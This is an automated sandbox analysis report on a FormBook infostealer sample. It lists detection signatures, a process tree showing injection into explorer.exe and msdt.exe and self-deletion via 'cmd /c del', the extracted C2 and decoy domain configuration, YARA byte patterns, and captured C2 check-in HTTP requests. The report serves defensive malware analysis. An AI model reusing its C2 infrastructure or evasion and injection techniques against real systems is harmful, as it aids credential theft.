Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report divpCHa0h7.exe

Overview

General Information

Sample Name:divpCHa0h7.exe
Analysis ID:502315
MD5:fda0d823b262ac2b1bd76a2053c29692
SHA1:73f72d7c987d44d1f236c138c5617b527c5ba340
SHA256:91a166f9a29ad832c9640078210a47e5afa928ab1a79a7b40d3b358e9c8bc5d5
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • divpCHa0h7.exe (PID: 3240 cmdline: 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 5712 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 4132 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 2256 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • msdt.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
        • cmd.exe (PID: 6732 cmdline: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.divpCHa0h7.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.divpCHa0h7.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.divpCHa0h7.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        1.2.divpCHa0h7.exe.3c268a0.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.divpCHa0h7.exe.3c268a0.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0xcd2c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xcd662:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xf50e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xf5482:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xd9375:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x101195:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0xd8e61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x100c81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0xd9477:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x101297:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0xd95ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x10140f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xce07a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xf5e9a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xd80dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xffefc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xcedf2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xf6c12:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xde867:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x106687:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0xdf90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 14 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Users\user\Desktop\divpCHa0h7.exe, ParentImage: C:\Users\user\Desktop\divpCHa0h7.exe, ParentProcessId: 2256, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6440

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: divpCHa0h7.exeVirustotal: Detection: 16%Perma Link
          Source: divpCHa0h7.exeReversingLabs: Detection: 17%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY
          Source: 5.2.divpCHa0h7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.divpCHa0h7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: divpCHa0h7.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: divpCHa0h7.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: divpCHa0h7.exe, 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, msdt.exe, 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: divpCHa0h7.exe, msdt.exe
          Source: Binary string: msdt.pdb source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 4x nop then pop ebx5_2_00406AB9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx15_2_02766AB9

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.161 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mambacustomboats.com
          Source: C:\Windows\explorer.exeDomain query: www.sanlifalan.com
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.165.34.6 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ribbonofficial.com
          Source: C:\Windows\explorer.exeDomain query: www.floaterslaser.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.esyscoloradosprings.com/fqiq/
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1Host: www.ribbonofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.sanlifalan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1Host: www.floaterslaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.mambacustomboats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Oct 2021 17:47:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 59389116584X-Dc: gcp-europe-west1X-Request-ID: cecbddb8-e852-4c90-927e-af3e5555f963X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 69da64d2c8f74303-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 17:47:45 GMTServer: Apache/2.4.51 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 884Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 